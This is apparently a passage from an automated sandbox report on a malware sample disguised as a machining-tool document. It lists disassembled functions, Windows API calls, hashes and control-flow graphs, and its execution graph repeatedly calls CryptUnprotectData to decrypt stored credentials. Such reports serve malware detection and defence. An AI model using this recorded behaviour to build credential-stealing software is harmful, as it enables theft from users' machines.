                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00404EB9
                                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404F0A
                                                                                                                                                                                                                            • Part of subcall function 00403F2E: SendMessageA.USER32(0001043A,00000000,00000000,00000000), ref: 00403F40
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                          • Opcode ID: 44b8d16fffa3cf511a27652146f874074467920310ea138c5a7b32cc615b7cdd
                                                                                                                                                                                                                          • Instruction ID: 4911906597f3eaa4ffbe68f0188cda158002c4f31c253b535ba85266db60279e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44b8d16fffa3cf511a27652146f874074467920310ea138c5a7b32cc615b7cdd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC0175B110020DABDB205F52EC81AAB3625F7C4751F204037FB01756D1C7399C51AAB9
                                                                                                                                                                                                                          Function 0040548E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421528,Error launching installer), ref: 004054B7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004054C4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error launching installer, xrefs: 004054A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                          • Opcode ID: 11830fbe1599591dde0320708e1ac997fc89973e1d072e2855f62d3e6df5e4ac
                                                                                                                                                                                                                          • Instruction ID: 371522acfb7cd9539d7ae69e543ca64f087bc7c9f75cc5940c594e3c03f6d28b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11830fbe1599591dde0320708e1ac997fc89973e1d072e2855f62d3e6df5e4ac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E04FF1A102097FEB009BA0EC05F7B7BBCE754704F404471BD01F21A0D678A8408A79
                                                                                                                                                                                                                          Function 004035E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,766B3410,00000000,C:\Users\user\AppData\Local\Temp\,004035C0,004033DA,?), ref: 00403602
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(0051BBC8), ref: 00403609
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004035E8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                          • Opcode ID: 1acdd7952de975a5de59207208c6b073b3c222a5b17fc555175c0845e7698c1d
                                                                                                                                                                                                                          • Instruction ID: d46364a902ea990bd632c56cfb9f57f9e2cdd9ba0813e856c63e7cee72968c4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1acdd7952de975a5de59207208c6b073b3c222a5b17fc555175c0845e7698c1d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93E0EC32915120ABC7225F65ED04B9ABBA87B49B26F09006BF9407B3A08B746D425AD9
                                                                                                                                                                                                                          Function 004057B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 004057BC
                                                                                                                                                                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 004057CA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                          • Opcode ID: 34bcb0359ecd18d08228093df84e7486f7a8c477fb5e2f0dc73f73f3b7a35111
                                                                                                                                                                                                                          • Instruction ID: 18ef7b42b2ca9dadb34ddb0bde1cbbab447e34e044d1250ac1c79b5d16d3cc30
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34bcb0359ecd18d08228093df84e7486f7a8c477fb5e2f0dc73f73f3b7a35111
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8ED0A762418D70AEF30362109C04B8F6A58CF13700F194463E040A7190C2784C414BFD
                                                                                                                                                                                                                          Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                          • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                                                          • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                                                                                                                                          Function 004058D5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004058FD
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040590E
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                          • Opcode ID: 0fc7b795b21fde4e840a5a8ebe1bc240de770827404be4bbaaf079e1ba8cc010
                                                                                                                                                                                                                          • Instruction ID: 18e4c75142147f65de27112721ce36ab9a51ac25249ca18f40cf651f68c78b39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fc7b795b21fde4e840a5a8ebe1bc240de770827404be4bbaaf079e1ba8cc010
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0F632505414FFCB029FA4DD00D9EBBA8DF05360B2540B5F800F7250D234EE01AB99

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:9%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:29.4%
                                                                                                                                                                                                                          Total number of Nodes:51
                                                                                                                                                                                                                          Total number of Limit Nodes:6
                                                                                                                                                                                                                          execution_graph 36788 11de20 36789 11de2c 36788->36789 36799 385d1e70 36789->36799 36803 385d1e80 36789->36803 36790 11decb 36807 385ea280 36790->36807 36811 385ea290 36790->36811 36791 11dfdc 36815 385ea7de 36791->36815 36819 385ea8e8 36791->36819 36792 11dfe3 36801 385d1ea2 36799->36801 36800 385d2289 36800->36790 36801->36800 36823 385dc5b9 36801->36823 36805 385d1ea2 36803->36805 36804 385d2289 36804->36790 36805->36804 36806 385dc5b9 CryptUnprotectData 36805->36806 36806->36805 36809 385ea2b2 36807->36809 36808 385ea73f 36808->36791 36809->36808 36810 385dc5b9 CryptUnprotectData 36809->36810 36810->36809 36813 385ea2b2 36811->36813 36812 385ea73f 36812->36791 36813->36812 36814 385dc5b9 CryptUnprotectData 36813->36814 36814->36813 36817 385ea7ec 36815->36817 36816 385ead24 36816->36792 36817->36816 36818 385dc5b9 CryptUnprotectData 36817->36818 36818->36817 36821 385ea90a 36819->36821 36820 385ead24 36820->36792 36821->36820 36822 385dc5b9 CryptUnprotectData 36821->36822 36822->36821 36824 385dc5c8 36823->36824 36828 385dcbf0 36824->36828 36836 385dcbe0 36824->36836 36825 385dc638 36825->36801 36829 385dcc15 36828->36829 36830 385dccc9 36828->36830 36829->36830 36834 385dcbf0 CryptUnprotectData 36829->36834 36835 385dcbe0 CryptUnprotectData 36829->36835 36844 385dcdd1 36829->36844 36848 385dc9a8 36830->36848 36834->36830 36835->36830 36837 385dcc15 36836->36837 36838 385dccc9 36836->36838 36837->36838 36841 385dcdd1 CryptUnprotectData 36837->36841 36842 385dcbf0 CryptUnprotectData 36837->36842 36843 385dcbe0 CryptUnprotectData 36837->36843 36839 385dc9a8 CryptUnprotectData 36838->36839 36840 385dce95 36839->36840 36840->36825 36841->36838 36842->36838 36843->36838 36845 385dcdd9 36844->36845 36846 385dc9a8 CryptUnprotectData 36845->36846 36847 385dce95 36846->36847 36847->36830 36849 385dd080 CryptUnprotectData 36848->36849 36850 385dce95 36849->36850 36850->36825

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 0011BB48 Relevance: 6.6, Strings: 5, Instructions: 348COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1319 11bb48-11bb5b 1320 11bb61-11bb6a 1319->1320 1321 11bc9a-11bca1 1319->1321 1322 11bb70-11bb74 1320->1322 1323 11bca4 1320->1323 1324 11bb76 1322->1324 1325 11bb8e-11bb95 1322->1325 1328 11bca9-11bcd0 1323->1328 1326 11bb79-11bb84 1324->1326 1325->1321 1327 11bb9b-11bba8 1325->1327 1326->1323 1329 11bb8a-11bb8c 1326->1329 1327->1321 1334 11bbae-11bbc1 1327->1334 1332 11bcd2-11bcea 1328->1332 1333 11bcfc 1328->1333 1329->1325 1329->1326 1346 11bcf3-11bcf6 1332->1346 1347 11bcec-11bcf1 1332->1347 1335 11bcfe-11bd02 1333->1335 1336 11bbc3 1334->1336 1337 11bbc6-11bbce 1334->1337 1336->1337 1339 11bbd0-11bbd6 1337->1339 1340 11bc3b-11bc3d 1337->1340 1339->1340 1342 11bbd8-11bbde 1339->1342 1340->1321 1341 11bc3f-11bc45 1340->1341 1341->1321 1344 11bc47-11bc51 1341->1344 1342->1328 1345 11bbe4-11bbfc 1342->1345 1344->1328 1348 11bc53-11bc6b 1344->1348 1356 11bc29-11bc2c 1345->1356 1357 11bbfe-11bc04 1345->1357 1350 11bd03-11bd40 1346->1350 1351 11bcf8-11bcfa 1346->1351 1347->1335 1360 11bc90-11bc93 1348->1360 1361 11bc6d-11bc73 1348->1361 1358 11bd42 1350->1358 1359 11bd47-11be24 call 114120 call 113c40 1350->1359 1351->1332 1351->1333 1356->1323 1363 11bc2e-11bc31 1356->1363 1357->1328 1362 11bc0a-11bc1e 1357->1362 1358->1359 1380 11be26 1359->1380 1381 11be2b-11be4c call 1155d8 1359->1381 1360->1323 1366 11bc95-11bc98 1360->1366 1361->1328 1365 11bc75-11bc89 1361->1365 1362->1328 1371 11bc24 1362->1371 1363->1323 1367 11bc33-11bc39 1363->1367 1365->1328 1373 11bc8b 1365->1373 1366->1321 1366->1344 1367->1339 1367->1340 1371->1356 1373->1360 1380->1381 1383 11be51-11be5c 1381->1383 1384 11be63-11be67 1383->1384 1385 11be5e 1383->1385 1386 11be69-11be6a 1384->1386 1387 11be6c-11be73 1384->1387 1385->1384 1388 11be8b-11becf 1386->1388 1389 11be75 1387->1389 1390 11be7a-11be88 1387->1390 1394 11bf35-11bf4c 1388->1394 1389->1390 1390->1388 1396 11bed1-11bee7 1394->1396 1397 11bf4e-11bf73 1394->1397 1401 11bf11 1396->1401 1402 11bee9-11bef5 1396->1402 1403 11bf75-11bf8a 1397->1403 1404 11bf8b 1397->1404 1407 11bf17-11bf34 1401->1407 1405 11bef7-11befd 1402->1405 1406 11beff-11bf05 1402->1406 1403->1404 1410 11bf8c 1404->1410 1408 11bf0f 1405->1408 1406->1408 1407->1394 1408->1407 1410->1410
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: 069a863001981995a5153d059115e5b514bb64c07cd37c586b50e43d0b7ddc7d
                                                                                                                                                                                                                          • Instruction ID: 540bad3cb751c92b185d50690667adbcd2b46f02dddc413461c859abc1e0cde3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 069a863001981995a5153d059115e5b514bb64c07cd37c586b50e43d0b7ddc7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E10C75A04218CFDB18DFA9C984ADDBBB1FF49310F158069E809AB361DB31AD81CF50
                                                                                                                                                                                                                          Function 0011C2B0 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1413 11c2b0-11c2e0 1414 11c2e2 1413->1414 1415 11c2e7-11c3c4 call 114120 call 113c40 1413->1415 1414->1415 1425 11c3c6 1415->1425 1426 11c3cb-11c3ec call 1155d8 1415->1426 1425->1426 1428 11c3f1-11c3fc 1426->1428 1429 11c403-11c407 1428->1429 1430 11c3fe 1428->1430 1431 11c409-11c40a 1429->1431 1432 11c40c-11c413 1429->1432 1430->1429 1433 11c42b-11c46f 1431->1433 1434 11c415 1432->1434 1435 11c41a-11c428 1432->1435 1439 11c4d5-11c4ec 1433->1439 1434->1435 1435->1433 1441 11c471-11c487 1439->1441 1442 11c4ee-11c513 1439->1442 1446 11c4b1 1441->1446 1447 11c489-11c495 1441->1447 1448 11c515-11c52a 1442->1448 1449 11c52b 1442->1449 1452 11c4b7-11c4d4 1446->1452 1450 11c497-11c49d 1447->1450 1451 11c49f-11c4a5 1447->1451 1448->1449 1453 11c4af 1450->1453 1451->1453 1452->1439 1453->1452
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: 0ed5fb48d9b15d0a1efff5ce76de5f72a5baea4a11fc7f32badc6d2c9d8f07e0
                                                                                                                                                                                                                          • Instruction ID: f7946d1db2b7d49c5277fff70fdc3c81d103b3fef480675669dd7d957cb428c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ed5fb48d9b15d0a1efff5ce76de5f72a5baea4a11fc7f32badc6d2c9d8f07e0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB81C474E00218CFDB18DFA9D994ADDBBF2BF89310F14806AE419AB365DB349981CF50
                                                                                                                                                                                                                          Function 0011BFE0 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1457 11bfe0-11c010 1458 11c012 1457->1458 1459 11c017-11c0f4 call 114120 call 113c40 1457->1459 1458->1459 1469 11c0f6 1459->1469 1470 11c0fb-11c11c call 1155d8 1459->1470 1469->1470 1472 11c121-11c12c 1470->1472 1473 11c133-11c137 1472->1473 1474 11c12e 1472->1474 1475 11c139-11c13a 1473->1475 1476 11c13c-11c143 1473->1476 1474->1473 1477 11c15b-11c19f 1475->1477 1478 11c145 1476->1478 1479 11c14a-11c158 1476->1479 1483 11c205-11c21c 1477->1483 1478->1479 1479->1477 1485 11c1a1-11c1b7 1483->1485 1486 11c21e-11c243 1483->1486 1490 11c1e1 1485->1490 1491 11c1b9-11c1c5 1485->1491 1493 11c245-11c25a 1486->1493 1494 11c25b 1486->1494 1492 11c1e7-11c204 1490->1492 1495 11c1c7-11c1cd 1491->1495 1496 11c1cf-11c1d5 1491->1496 1492->1483 1493->1494 1497 11c1df 1495->1497 1496->1497 1497->1492
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: d7ba9baf1f7c1999a5a0f67a834470c7cbac01a31748942cb5529b77fab4eb4a
                                                                                                                                                                                                                          • Instruction ID: 0f7beb62483143d55fb8d06dae6a53251b41f42326aca7846935482215e33b0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7ba9baf1f7c1999a5a0f67a834470c7cbac01a31748942cb5529b77fab4eb4a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB81D474E40218DFDB18DFA9C894ADDBBF2BF89310F248069E409AB365DB349981CF50
                                                                                                                                                                                                                          Function 0011CB25 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1501 11cb25-11cb50 1502 11cb52 1501->1502 1503 11cb57-11cc34 call 114120 call 113c40 1501->1503 1502->1503 1513 11cc36 1503->1513 1514 11cc3b-11cc5c call 1155d8 1503->1514 1513->1514 1516 11cc61-11cc6c 1514->1516 1517 11cc73-11cc77 1516->1517 1518 11cc6e 1516->1518 1519 11cc79-11cc7a 1517->1519 1520 11cc7c-11cc83 1517->1520 1518->1517 1521 11cc9b-11ccdf 1519->1521 1522 11cc85 1520->1522 1523 11cc8a-11cc98 1520->1523 1527 11cd45-11cd5c 1521->1527 1522->1523 1523->1521 1529 11cce1-11ccf7 1527->1529 1530 11cd5e-11cd83 1527->1530 1534 11cd21 1529->1534 1535 11ccf9-11cd05 1529->1535 1537 11cd85-11cd9a 1530->1537 1538 11cd9b 1530->1538 1536 11cd27-11cd44 1534->1536 1539 11cd07-11cd0d 1535->1539 1540 11cd0f-11cd15 1535->1540 1536->1527 1537->1538 1541 11cd1f 1539->1541 1540->1541 1541->1536
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
